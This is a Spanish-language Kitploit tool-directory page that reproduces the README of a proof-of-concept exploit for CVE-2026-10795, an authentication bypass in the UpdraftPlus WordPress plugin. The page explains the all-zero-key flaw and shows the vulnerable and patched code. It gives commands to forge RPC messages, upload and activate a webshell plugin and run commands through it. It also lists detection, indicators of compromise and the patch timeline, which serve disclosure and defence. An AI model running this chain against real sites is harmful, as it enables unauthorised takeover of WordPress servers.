Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-10795 — CVE-2026-10795 – Bypass de autenticación de UpdraftPlus | Kitploit
Herramientas/GitHubGitHub/izxci/cve-2026-10795
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónDesarrollo de Payloads
GitHubizxci/cve-2026-10795

CVE-2026-10795

CVE-2026-10795 – Bypass de autenticación de UpdraftPlus

Ver Repositorio
1hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-10795

CVE-2026-10795 – Bypass de autenticación en UpdraftPlus

CVE-2026-10795 – PoC de bypass de autenticación en UpdraftPlus

⚠️ Descargo de responsabilidad: Este repositorio es solo con fines educativos.
Úsalo únicamente en sistemas que poseas o para los que tengas permiso explícito de prueba.
El autor no es responsable de ningún uso indebido.


📋 Descripción general

CampoDetalles
PluginUpdraftPlus: WP Backup & Migration
Versiones afectadas≤ 1.26.4
Versión parcheada1.26.5
Puntuación CVSS8.1 (Alta)
Tipo de vulnerabilidadBypass de autenticación sin autenticar → RCE
Descubierto porvtim (Wordfence Bug Bounty)
Recompensa$5,200

🔍 Resumen de la vulnerabilidad

UpdraftPlus registra un listener RPC no autenticado en cada carga de página para los sitios conectados a UpdraftCentral.

La función decrypt_message() no valida el valor de retorno de $rsa->decrypt().
Cuando falla el descifrado RSA, se pasa false a Rijndael::setKey(), lo que colapsa a una clave AES-128 determinista de todo ceros.

Un atacante puede:

  1. Forjar un udrpc_message cifrado con la clave cero
  2. Hacer que el servidor lo descifre correctamente
  3. Ejecutar comandos RPC arbitrarios como el administrador conectado
  4. Subir y activar un plugin malicioso → Ejecución remota de código

🧬 Código vulnerable

root@kitploit:~
// updraftplus/includes/class-remote-communications-v2.php
// Lines 460-491 (version 1.26.4)

$sym_key = $rsa->decrypt($sym_key);
// ❌ No return value check!

$rij->setKey($sym_key);  // false → all-zero key
return $rij->decrypt($ciphertext);

✅ Código parcheado

root@kitploit:~
$sym_key = $rsa->decrypt($sym_key);

// ✅ Added in 1.26.5
if (false === $sym_key || !is_string($sym_key) || strlen($sym_key) < 16) {
    return false;
}

$rij->setKey($sym_key);
return $rij->decrypt($ciphertext);

📁 Estructura del repositorio

root@kitploit:~
updraftplus-auth-bypass/
├── README.md
├── poc.py                  # Main exploit script
├── requirements.txt        # Python dependencies
├── payloads/
│   ├── list_plugins.py     # List installed plugins
│   ├── upload_shell.py     # Upload webshell plugin
│   └── activate_plugin.py  # Activate uploaded plugin
├── shell/
│   ├── build_shell.py      # Builds webshell ZIP
│   └── test-shell.php      # Minimal PHP webshell
└── docs/
    ├── technical-analysis.md
    └── patch-diff.md

⚙️ Instalación

root@kitploit:~
git clone https://github.com/yourname/updraftplus-auth-bypass
cd updraftplus-auth-bypass
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests==2.31.0
pycryptodome==3.20.0

🧪 Configuración del entorno de prueba

1. Instalar XAMPP

root@kitploit:~
https://www.apachefriends.org
Start: Apache + MySQL

2. Instalar WordPress + UpdraftPlus 1.26.4

root@kitploit:~
# Place WordPress in htdocs
C:/xampp/htdocs/wordpress/

# Install vulnerable plugin version
# Download: https://plugins.trac.wordpress.org/browser/updraftplus/tags/1.26.4

3. Conectar con UpdraftCentral

root@kitploit:~
WordPress Admin → Settings → UpdraftPlus → UpdraftCentral tab → Connect

⚠️ Requisito: El sitio debe estar conectado a UpdraftCentral para que la vulnerabilidad sea explotable.


🚀 Uso

Uso básico

root@kitploit:~
python poc.py --url http://localhost/wordpress/ --user-id 1

Listar plugins

root@kitploit:~
python poc.py --url http://localhost/wordpress/ --cmd plugin.get_plugins

Subir webshell

root@kitploit:~
# Step 1: Build the shell ZIP
python shell/build_shell.py

# Step 2: Upload
python poc.py --url http://localhost/wordpress/ --cmd upload_shell

# Step 3: Activate
python poc.py --url http://localhost/wordpress/ --cmd activate_shell

# Step 4: Test RCE
curl "http://localhost/wordpress/wp-content/plugins/test-shell/test-shell.php?cmd=whoami"

🔬 Cómo funciona

root@kitploit:~
poc.py
  │
  ├─ 1. Craft malformed RSA-encrypted sym_key (garbage bytes)
  │
  ├─ 2. Encrypt RPC payload with ZERO AES-128 key (0x00 * 16)
  │
  ├─ 3. Build udrpc_message:
  │       [3-byte hex len][fake_sym_key][16-byte hex cipherlen][ciphertext]
  │
  ├─ 4. POST to target (no auth, no nonce, no cookies needed)
  │
  └─ 5. Server-side:
          rsa->decrypt(garbage) → false
          setKey(false)         → 0x00 key
          decrypt(ciphertext)   → our payload ✅
          wp_set_current_user() → admin access
          RPC command executes  → RCE 💀

🛡️ Detección y mitigación

Mitigación

root@kitploit:~
Update UpdraftPlus to version 1.26.5 immediately.

Detección (análisis de registros)

root@kitploit:~
# Look for suspicious POST requests with udrpc_message
grep "udrpc_message" /var/log/apache2/access.log

# Wordfence users are protected since June 3, 2026

Indicadores de compromiso

root@kitploit:~
- Instalaciones de plugins inesperadas
- Nuevos archivos PHP en wp-content/plugins/
- Peticiones POST a la raíz de WordPress con el parámetro udrpc_message
- Acciones inesperadas a nivel de administrador en los registros de WordPress

📅 Cronología de divulgación

FechaEvento
1 de junio de 2026Vulnerabilidad enviada a través del Bug Bounty de Wordfence
3 de junio de 2026Validada y divulgada al proveedor
3 de junio de 2026Regla de firewall de Wordfence Premium implementada
4 de junio de 2026El proveedor reconoció el problema
5 de junio de 2026Parche publicado (v1.26.5)
3 de julio de 2026Protección Wordfence Free activa

📚 Referencias

  • Aviso de Wordfence
  • Página del plugin UpdraftPlus
  • Documentación de RSA de phpseclib
  • Registro de cambios del plugin

👤 Créditos

  • Descubrimiento original: vtim (Programa Bug Bounty de Wordfence)
  • Autor del PoC: izxci
  • Propósito: Educativo / Investigación de seguridad

📜 Licencia

root@kitploit:~
MIT License – For educational use only.
Unauthorized use against systems you don't own is illegal.
Descargar herramienta